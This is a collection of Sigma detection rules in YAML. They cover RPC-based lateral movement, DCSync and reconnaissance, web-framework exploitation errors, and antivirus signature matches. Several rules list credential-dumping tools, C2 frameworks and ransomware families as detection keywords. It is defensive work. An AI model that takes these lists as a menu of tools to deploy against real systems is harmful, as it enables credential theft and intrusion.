- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.discovery
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b"'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b
filter:
OpNum:
- 0
- 1
condition: selection and not filter
falsepositives:
- Unknown
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml
================================================
title: Possible DCSync Attack
id: 56fda488-113e-4ce9-8076-afc2457922c3
status: test
description: Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.t1033
- attack.discovery
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes, enable DRSR UUID (e3514235-4b06-11d1-ab04-00c04fc2dcd2) for "dangerous" opcodes (not 0,1 or 12) only from trusted IPs (DCs)'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: e3514235-4b06-11d1-ab04-00c04fc2dcd2
filter:
OpNum:
- 0
- 1
- 12
condition: selection and not filter
falsepositives:
- Unknown
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml
================================================
title: Remote Encrypting File System Abuse
id: 5f92fff9-82e2-48eb-8fc1-8b133556a551
status: test
description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR
references:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.lateral-movement
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:df1941c5-fe89-4e79-bf10-463657acf44d or c681d488-d850-11d0-8c52-00c04fd90f7e'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid:
- df1941c5-fe89-4e79-bf10-463657acf44d
- c681d488-d850-11d0-8c52-00c04fd90f7e
condition: selection
falsepositives:
- Legitimate usage of remote file encryption
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml
================================================
title: Remote Event Log Recon
id: 2053961f-44c7-4a64-b62d-f6e72800af0d
status: test
description: Detects remote RPC calls to get event log information via EVEN or EVEN6
references:
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.discovery
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:82273fdc-e32a-18c3-3f78-827929dc23ea and uuid:f6beaff7-1e19-4fbb-9f8f-b89e2018337c"'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid:
- 82273fdc-e32a-18c3-3f78-827929dc23ea
- f6beaff7-1e19-4fbb-9f8f-b89e2018337c
condition: selection
falsepositives:
- Remote administrative tasks on Windows Events
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml
================================================
title: Remote Schedule Task Lateral Movement via ITaskSchedulerService
id: ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d
status: test
description: Detects remote RPC calls to create or execute a scheduled task
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.lateral-movement
- attack.t1053
- attack.t1053.002
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c"'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c
OpNum:
- 1
- 3
- 4
- 10
- 11
- 12
- 13
- 14
- 15
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml
================================================
title: Remote Schedule Task Recon via ITaskSchedulerService
id: 7f7c49eb-2977-4ac8-8ab0-ab1bae14730e
status: test
description: Detects remote RPC calls to read information about scheduled tasks
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.discovery
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c"'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c
filter:
OpNum:
- 1
- 3
- 4
- 10
- 11
- 12
- 13
- 14
- 15
condition: selection and not filter
falsepositives:
- Unknown
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml
================================================
title: Remote Printing Abuse for Lateral Movement
id: bc3a4b0c-e167-48e1-aa88-b3020950e560
status: test
description: Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR
references:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.lateral-movement
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:12345678-1234-abcd-ef00-0123456789ab or 76f03f96-cdfd-44fc-a22c-64950a001209 or ae33069b-a2a8-46ee-a235-ddfd339be281 or 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid:
- 12345678-1234-abcd-ef00-0123456789ab
- 76f03f96-cdfd-44fc-a22c-64950a001209
- 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1
- ae33069b-a2a8-46ee-a235-ddfd339be281
condition: selection
falsepositives:
- Actual printing
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml
================================================
title: Remote DCOM/WMI Lateral Movement
id: 68050b10-e477-4377-a99b-3721b422d6ef
status: test
description: Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.lateral-movement
- attack.execution
- attack.t1021.003
- attack.t1047
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid:
- 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57
- 99fcfec4-5260-101b-bbcb-00aa0021347a
- 000001a0-0000-0000-c000-000000000046
- 00000131-0000-0000-c000-000000000046
- 00000143-0000-0000-c000-000000000046
- 00000000-0000-0000-c000-000000000046
condition: selection
falsepositives:
- Some administrative tasks on remote host
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml
================================================
title: Remote Registry Lateral Movement
id: 35c55673-84ca-4e99-8d09-e334f3c29539
status: test
description: Detects remote RPC calls to modify the registry and possible execute code
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.defense-evasion
- attack.lateral-movement
- attack.t1112
- attack.persistence
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003"'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003
OpNum:
- 6
- 7
- 8
- 13
- 18
- 19
- 21
- 22
- 23
- 35
condition: selection
falsepositives:
- Remote administration of registry values
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml
================================================
title: Remote Registry Recon
id: d8ffe17e-04be-4886-beb9-c1dd1944b9a8
status: test
description: Detects remote RPC calls to collect information
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.discovery
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003"'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003
filter:
OpNum:
- 6
- 7
- 8
- 13
- 18
- 19
- 21
- 22
- 23
- 35
condition: selection and not filter
falsepositives:
- Remote administration of registry values
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml
================================================
title: Remote Server Service Abuse
id: b6ea3cc7-542f-43ef-bbe4-980fbed444c7
status: test
description: Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.lateral-movement
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188
condition: selection
falsepositives:
- Legitimate remote share creation
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml
================================================
title: Remote Server Service Abuse for Lateral Movement
id: 10018e73-06ec-46ec-8107-9172f1e04ff2
status: test
description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.lateral-movement
- attack.execution
- attack.t1569.002
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 367abb81-9844-35f1-ad32-98f038001003
condition: selection
falsepositives:
- Administrative tasks on remote services
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml
================================================
title: Remote Schedule Task Lateral Movement via SASec
id: aff229ab-f8cd-447b-b215-084d11e79eb0
status: test
description: Detects remote RPC calls to create or execute a scheduled task via SASec
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.privilege-escalation
- attack.lateral-movement
- attack.execution
- attack.persistence
- attack.t1053
- attack.t1053.002
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f"'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f
OpNum:
- 0
- 1
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml
================================================
title: Recon Activity via SASec
id: 0a3ff354-93fc-4273-8a03-1078782de5b7
status: test
description: Detects remote RPC calls to read information about scheduled tasks via SASec
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.discovery
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f"'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f
filter:
OpNum:
- 0
- 1
condition: selection and not filter
falsepositives:
- Unknown
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml
================================================
title: SharpHound Recon Account Discovery
id: 65f77b1e-8e79-45bf-bb67-5988a8ce45a5
status: test
description: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.t1087
- attack.discovery
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:6bffd098-a112-3610-9833-46c3f87e345a opnum:2'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 6bffd098-a112-3610-9833-46c3f87e345a
OpNum: 2
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml
================================================
title: SharpHound Recon Sessions
id: 6d580420-ff3f-4e0e-b6b0-41b90c787e28
status: test
description: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.
references:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183
- https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md
- https://github.com/zeronetworks/rpcfirewall
- https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/
author: Sagie Dulce, Dekel Paz
date: 2022-01-01
tags:
- attack.discovery
- attack.t1033
logsource:
product: rpc_firewall
category: application
definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188 opnum:12'
detection:
selection:
EventLog: RPCFW
EventID: 3
InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188
OpNum: 12
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/application/ruby/appframework_ruby_on_rails_exceptions.yml
================================================
title: Ruby on Rails Framework Exceptions
id: 0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a
status: stable
description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
references:
- http://edgeguides.rubyonrails.org/security.html
- http://guides.rubyonrails.org/action_controller_overview.html
- https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception
- https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb
author: Thomas Patzke
date: 2017-08-06
modified: 2020-09-01
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: ruby_on_rails
detection:
keywords:
- ActionController::InvalidAuthenticityToken
- ActionController::InvalidCrossOriginRequest
- ActionController::MethodNotAllowed
- ActionController::BadRequest
- ActionController::ParameterMissing
condition: keywords
falsepositives:
- Application bugs
level: medium
================================================
FILE: rules/application/spring/spring_application_exceptions.yml
================================================
title: Spring Framework Exceptions
id: ae48ab93-45f7-4051-9dfe-5d30a3f78e33
status: stable
description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts
references:
- https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html
author: Thomas Patzke
date: 2017-08-06
modified: 2020-09-01
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: spring
detection:
keywords:
- AccessDeniedException
- CsrfException
- InvalidCsrfTokenException
- MissingCsrfTokenException
- CookieTheftException
- InvalidCookieException
- RequestRejectedException
condition: keywords
falsepositives:
- Application bugs
level: medium
================================================
FILE: rules/application/spring/spring_spel_injection.yml
================================================
title: Potential SpEL Injection In Spring Framework
id: e9edd087-89d8-48c9-b0b4-5b9bb10896b8
status: test
description: Detects potential SpEL Injection exploitation, which may lead to RCE.
references:
- https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection
- https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
author: Moti Harmats
date: 2023-02-11
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: spring
definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'
detection:
keywords:
- 'org.springframework.expression.ExpressionException'
condition: keywords
falsepositives:
- Application bugs
level: high
================================================
FILE: rules/application/sql/app_sqlinjection_errors.yml
================================================
title: Suspicious SQL Error Messages
id: 8a670c6d-7189-4b1c-8017-a417ca84a086
status: test
description: Detects SQL error messages that indicate probing for an injection attack
references:
- http://www.sqlinjection.net/errors
author: Bjoern Kimminich
date: 2017-11-27
modified: 2023-02-12
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: sql
definition: 'Requirements: application error logs must be collected (with LOG_LEVEL ERROR and above)'
detection:
keywords:
# Oracle
- quoted string not properly terminated
# MySQL
- You have an error in your SQL syntax
# SQL Server
- Unclosed quotation mark
# SQLite
- 'near "*": syntax error'
- SELECTs to the left and right of UNION do not have the same number of result columns
condition: keywords
falsepositives:
- A syntax error in MySQL also occurs in non-dynamic (safe) queries if there is an empty in() clause, that may often be the case.
level: high
================================================
FILE: rules/application/velocity/velocity_ssti_injection.yml
================================================
title: Potential Server Side Template Injection In Velocity
id: 16c86189-b556-4ee8-b4c7-7e350a195a4f
status: test
description: Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE.
references:
- https://antgarsil.github.io/posts/velocity/
- https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
author: Moti Harmats
date: 2023-02-11
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: velocity
definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'
detection:
keywords:
- 'ParseErrorException'
- 'VelocityException'
- 'TemplateInitException'
condition: keywords
falsepositives:
- Application bugs
- Missing .vm files
level: high
================================================
FILE: rules/category/antivirus/av_exploiting.yml
================================================
title: Antivirus Exploitation Framework Detection
id: 238527ad-3c2c-4e4f-a1f6-92fd63adb864
status: stable
description: |
Detects a highly relevant Antivirus alert that reports an exploitation framework.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
references:
- https://www.nextron-systems.com/?s=antivirus
- https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797
- https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424
- https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466
author: Florian Roth (Nextron Systems), Arnim Rupp
date: 2018-09-09
modified: 2024-11-02
tags:
- attack.execution
- attack.t1203
- attack.command-and-control
- attack.t1219.002
logsource:
category: antivirus
detection:
selection:
Signature|contains:
- 'Backdoor.Cobalt'
- 'Brutel'
- 'BruteR'
- 'CobaltStr'
- 'CobaltStrike'
- 'COBEACON'
- 'Cometer'
- 'Exploit.Script.CVE'
- 'IISExchgSpawnCMD'
- 'Metasploit'
- 'Meterpreter'
- 'MeteTool'
- 'Mpreter'
- 'MsfShell'
- 'PowerSploit'
- 'Razy'
- 'Rozena'
- 'Sbelt'
- 'Seatbelt'
- 'Sliver'
- 'Swrort'
condition: selection
falsepositives:
- Unlikely
level: critical
================================================
FILE: rules/category/antivirus/av_hacktool.yml
================================================
title: Antivirus Hacktool Detection
id: fa0c05b6-8ad3-468d-8231-c1cbccb64fba
status: stable
description: |
Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
references:
- https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/
- https://www.nextron-systems.com/?s=antivirus
author: Florian Roth (Nextron Systems), Arnim Rupp
date: 2021-08-16
modified: 2024-11-02
tags:
- attack.execution
- attack.t1204
logsource:
category: antivirus
detection:
selection:
- Signature|startswith:
- 'ATK/' # Sophos
- 'Exploit.Script.CVE'
- 'HKTL'
- 'HTOOL'
- 'PWS.'
- 'PWSX'
- 'SecurityTool'
# - 'FRP.'
- Signature|contains:
- 'Adfind'
- 'Brutel'
- 'BruteR'
- 'Cobalt'
- 'COBEACON'
- 'Cometer'
- 'DumpCreds'
- 'FastReverseProxy'
- 'Hacktool'
- 'Havoc'
- 'Impacket'
- 'Keylogger'
- 'Koadic'
- 'Mimikatz'
- 'Nighthawk'
- 'PentestPowerShell'
- 'Potato'
- 'PowerSploit'
- 'PowerSSH'
- 'PshlSpy'
- 'PSWTool'
- 'PWCrack'
- 'PWDump'
- 'Rozena'
- 'Rusthound'
- 'Sbelt'
- 'Seatbelt'
- 'SecurityTool'
- 'SharpDump'
- 'SharpHound'
- 'Shellcode'
- 'Sliver'
- 'Snaffler'
- 'SOAPHound'
- 'Splinter'
- 'Swrort'
- 'TurtleLoader'
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/category/antivirus/av_password_dumper.yml
================================================
title: Antivirus Password Dumper Detection
id: 78cc2dd2-7d20-4d32-93ff-057084c38b93
status: stable
description: |
Detects a highly relevant Antivirus alert that reports a password dumper.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
references:
- https://www.nextron-systems.com/?s=antivirus
- https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619
- https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448
author: Florian Roth (Nextron Systems), Arnim Rupp
date: 2018-09-09
modified: 2024-11-02
tags:
- attack.credential-access
- attack.t1003
- attack.t1558
- attack.t1003.001
- attack.t1003.002
logsource:
category: antivirus
detection:
selection:
- Signature|startswith: 'PWS'
- Signature|contains:
- 'Certify'
- 'DCSync'
- 'DumpCreds'
- 'DumpLsass'
- 'DumpPert'
- 'HTool/WCE'
- 'Kekeo'
- 'Lazagne'
- 'LsassDump'
- 'Mimikatz'
- 'MultiDump'
- 'Nanodump'
- 'NativeDump'
- 'Outflank'
- 'PShlSpy'
- 'PSWTool'
- 'PWCrack'
- 'PWDump'
- 'PWS.'
- 'PWSX'
- 'pypykatz'
- 'Rubeus'
- 'SafetyKatz'
- 'SecurityTool'
- 'SharpChrome'
- 'SharpDPAPI'
- 'SharpDump'
- 'SharpKatz'
- 'SharpS.' # Sharpsploit, e.g. 530ea2ff9049f5dfdfa0a2e9c27c2e3c0685eb6cbdf85370c20a7bfae49f592d
- 'ShpKatz'
- 'TrickDump'
condition: selection
falsepositives:
- Unlikely
level: critical
================================================
FILE: rules/category/antivirus/av_ransomware.yml
================================================
title: Antivirus Ransomware Detection
id: 4c6ca276-d4d0-4a8c-9e4c-d69832f8671f
status: test
description: |
Detects a highly relevant Antivirus alert that reports ransomware.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
references:
- https://www.nextron-systems.com/?s=antivirus
- https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916
- https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7
- https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045
- https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d
- https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c
- https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05
author: Florian Roth (Nextron Systems), Arnim Rupp
date: 2022-05-12
modified: 2024-11-02
tags:
- attack.t1486
- attack.impact
logsource:
category: antivirus
detection:
selection:
Signature|contains:
- 'BlackWorm'
- 'Chaos'
- 'Cobra'
- 'ContiCrypt'
- 'Crypter'
- 'CRYPTES'
- 'Cryptor'
- 'CylanCrypt'
- 'DelShad'
- 'Destructor'
- 'Filecoder'
- 'GandCrab'
- 'GrandCrab'
- 'Haperlock'
- 'Hiddentear'
- 'HydraCrypt'
- 'Krypt'
- 'Lockbit'
- 'Locker'
- 'Mallox'
- 'Phobos'
- 'Ransom'
- 'Ryuk'
- 'Ryzerlo'
- 'Stopcrypt'
- 'Tescrypt'
- 'TeslaCrypt'
- 'WannaCry'
- 'Xorist'
condition: selection
falsepositives:
- Unlikely
level: critical
================================================
FILE: rules/category/antivirus/av_relevant_files.yml
================================================
title: Antivirus Relevant File Paths Alerts
id: c9a88268-0047-4824-ba6e-4d81ce0b907c
status: test
description: |
Detects an Antivirus alert in a highly relevant file path or with a relevant file name.
This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
references:
- https://www.nextron-systems.com/?s=antivirus
author: Florian Roth (Nextron Systems), Arnim Rupp
date: 2018-09-09
modified: 2024-11-02
tags:
- attack.resource-development
- attack.t1588
logsource:
category: antivirus
detection:
selection_path:
Filename|contains:
- ':\PerfLogs\'
- ':\Temp\'
- ':\Users\Default\'
- ':\Users\Public\'
- ':\Windows\'
- '/www/'
# - '\Client\'
- '\inetpub\'
- '\tsclient\'
- 'apache'
- 'nginx'
- 'tomcat'
